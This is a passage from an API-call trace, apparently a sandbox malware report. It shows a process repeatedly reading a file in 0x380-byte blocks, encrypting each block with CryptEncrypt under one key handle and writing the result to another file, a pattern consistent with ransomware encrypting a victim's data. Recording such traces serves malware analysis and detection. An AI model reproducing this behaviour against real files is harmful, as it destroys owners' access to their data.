lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.715] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.716] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.716] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.716] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.716] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.716] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.716] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.717] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.717] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.717] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.717] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.717] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.718] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.718] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.718] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.718] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.718] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.718] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.718] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.718] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.718] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.718] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.730] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.730] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.730] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.731] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.731] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.731] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.731] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.731] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.731] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.732] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.732] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.732] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.732] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.732] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.733] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.733] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.733] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.733] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.733] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.733] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.734] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.734] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.734] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.734] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.734] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.734] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.734] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.735] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.735] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.735] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.735] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, 